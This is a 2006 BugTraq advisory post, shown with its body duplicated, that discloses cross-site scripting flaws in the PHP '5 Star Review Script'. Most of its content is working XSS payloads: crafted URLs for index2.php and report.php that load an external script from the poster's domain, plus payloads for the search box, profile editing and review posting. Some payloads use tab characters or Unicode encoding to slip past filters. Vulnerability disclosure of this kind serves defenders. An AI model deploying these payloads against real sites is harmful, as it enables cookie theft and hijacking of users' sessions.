BugTraq
Back to list
|
Post reply
5 Star Review - review-script.com - XSS w/ cookie output
Jun 11 2006 09:45PM
luny youfucktard com
5 Star Review Script
Homepage:
http://www.review-script.com/
Effected files:
index2.php
report.php
search box
editing your profile
posting a review.
----------------------------------
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tags before and after, we can insertour script code and produce
this vulnerability.
http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'><S
CRIPT%20SRC=http://www.youfucktard.
com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c5
7a8ca2d57d
Screenshots:
http://www.youfucktard.com/xsp/5star1.jpg
http://www.youfucktard.com/xsp/5star2.jpg
Aftering clicking the "Email a friend this link" we notice our text partyl is still on the screen aswell, dueto the cookie.
Screenshots:
http://www.youfucktard.com/xsp/5star3.jpg
--------------------------------------
report.php XSS Vuln same as above:
http://www.example.com/report.php?id=970&item_id=251'>">'><SCRIPT%20SRC=
http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<"
Again, the cookie data is output on our screen.
--------------------------------------
search_reviews.php XSS Vuln:
One way to achive this XSS example would be to use long UTF-8 Unicode encoding without semicolons. For PoC try
putting this in the search box:
'>">'<IMG SRC=javascr�
0105pt:aler�
0116('XSS')><"<"
<"<"
Now, if we try touse '>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Like the previous results, we get a screen spammed full of "javascript is not allowed" which goes all the way across, and down several
screens.
Screenshot:
http://www.youfucktard.com/xsp/5star4.jpg
---------------------------------------------
Editing your profile XSS Vuln:
For aPoC try using no filtering at all:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/5star5.jpg
http://www.youfucktard.com/xsp/5star6.jpg
------------------------------------------
When posting a review, theres many ways to bypass the filters they use. The way I used in thisscreenshot was to put a
tab between jav ascript. For aPoC make sure tabs on and enter:
<IMG SRC="jav ascript:alert('XSS');">
Screenshots:
http://www.youfucktard.com/xsp/5star7.jpg
http://www.youfucktard.com/xsp/5star8.jpg
-----------------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://www.review-script.com/
Effected files:
index2.php
report.php
search box
editing your profile
posting a review.
----------------------------------
index2.php XSS Vuln with cookie disclosure:
By ending quotes and using a few closing and opening tags before and after, we can insertour script code and produce
this vulnerability.
http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'><S
CRIPT%20SRC=http://www.youfucktard.
com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c5
7a8ca2d57d
Screenshots:
http://www.youfucktard.com/xsp/5star1.jpg
http://www.youfucktard.com/xsp/5star2.jpg
Aftering clicking the "Email a friend this link" we notice our text partyl is still on the screen aswell, dueto the cookie.
Screenshots:
http://www.youfucktard.com/xsp/5star3.jpg
--------------------------------------
report.php XSS Vuln same as above:
http://www.example.com/report.php?id=970&item_id=251'>">'><SCRIPT%20SRC=
http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<"
Again, the cookie data is output on our screen.
--------------------------------------
search_reviews.php XSS Vuln:
One way to achive this XSS example would be to use long UTF-8 Unicode encoding without semicolons. For PoC try
putting this in the search box:
'>">'<IMG SRC=javascr�
0105pt:aler�
0116('XSS')><"<"
<"<"
Now, if we try touse '>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Like the previous results, we get a screen spammed full of "javascript is not allowed" which goes all the way across, and down several
screens.
Screenshot:
http://www.youfucktard.com/xsp/5star4.jpg
---------------------------------------------
Editing your profile XSS Vuln:
For aPoC try using no filtering at all:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/5star5.jpg
http://www.youfucktard.com/xsp/5star6.jpg
------------------------------------------
When posting a review, theres many ways to bypass the filters they use. The way I used in thisscreenshot was to put a
tab between jav ascript. For aPoC make sure tabs on and enter:
<IMG SRC="jav ascript:alert('XSS');">
Screenshots:
http://www.youfucktard.com/xsp/5star7.jpg
http://www.youfucktard.com/xsp/5star8.jpg
-----------------------------------------------
[ reply ]